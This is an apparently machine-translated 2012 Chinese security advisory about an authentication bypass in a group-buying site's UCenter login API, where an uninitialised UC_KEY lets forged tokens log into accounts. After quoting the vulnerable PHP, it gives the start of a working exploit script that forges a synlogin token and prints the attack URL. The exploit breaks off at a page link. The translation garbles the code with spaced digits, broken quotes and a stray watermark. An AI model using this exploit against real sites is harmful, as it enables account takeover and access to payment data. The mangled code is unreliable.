Every day buy UC_KEY not initialize the security risks and patch-vulnerability warning-the black bar safety net

2012-04-17T00:00:00
ID MYHACK58:62201233687
Type myhack58
Reporter 佚名
Modified 2012-04-17T00:00:00

Description

Every day buy integrated ucenter one-stop login api,but UC_key not initialized will cause the attacker can log in to any account,or even operate the credit card information.

Detailed description:

$get = $post = array();

$code = @$_GET['code']; //get the token

parse_str(_authcode($code, 'DECODE', UC_KEY), $get); //UC_KEY without the initialization of the case will be empty

if(MAGIC_QUOTES_GPC) {

$get = _stripslashes($get); //yo Ho?

}

$timestamp = time();

if(empty($get)) {

exit('Invalid Request');

} elseif($timestamp - $get['time'] > 3 6 0 0) { //if the token timestamp is valid for less than one hour is not allowed to login

exit('Authracation has expiried');

}

$action = $get['action'];

... ...

if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcredit', 'getcreditsettings', 'updatecreditsettings'))) { //defines several operation interface,which,Well,there's a lot of fun things

... ...

function synlogin($get, $post) { //the login interface

$uid = (int) $get['uid']; //takes two parameters,uid and username

$username = $get['username'];

... ...

$query = $this->db->query("SELECT uid, password, secques FROM {$this->tablepre}system_members WHERE ucuid='$uid'"); //here pass is not a database within the uid,but ucuid,where the initial is 0,but here again the writing is rough,the username didn't enter the query process,that is can only log in the first account

$UserFields = $this->db->fetch_array($query);

if (!$ UserFields) {

;

}

if($UserFields) {

$auth = TTTuangouAuthcode("{$UserFields['password']}\t{$UserFields['secques']}\t{$UserFields['uid']}"); //remove the user information after the direct Station login

_setcookie('sid', ", -86400 * 3 6 5);

_setcookie('auth',$auth,(3 6 5*8 6 4 0 0));

_setcookie('cookietime','2 5 9 2 0 0 0',(3 6 5*8 6 4 0 0));

... ...

UC_KEY not initialized to null,so it is equal to others know your UC_KEY,can be directly operation,like some of the application initialization 1 2 3 4 5 6 in fact, as ridiculous,out of your source code to see at a glance do not yet know?

Vulnerability to prove:

Exp:

< ? php

error_reporting(0);

$username = $argv[1];

$key = ";

$code = 'time=1 3 5 6 7 9 6 8 0 0&username='.$ username.'& amp;uid=0&action=synlogin';

echo "$code\n";

$exp = urlencode(authcode($code, "ENCODE", $key));

print_r('/api/uc. php? code='.$ exp);

function authcode($string, $operation = 'DECODE', $key = ", $expiry = 0) {

$ckey_length = 4; www.2cto.com

$key = md5($key ? $key : UC_KEY);

$keya = md5(substr($key, 0, 1 6));

$keyb = md5(substr($key, 1 6, 1 6));

[1] [2] next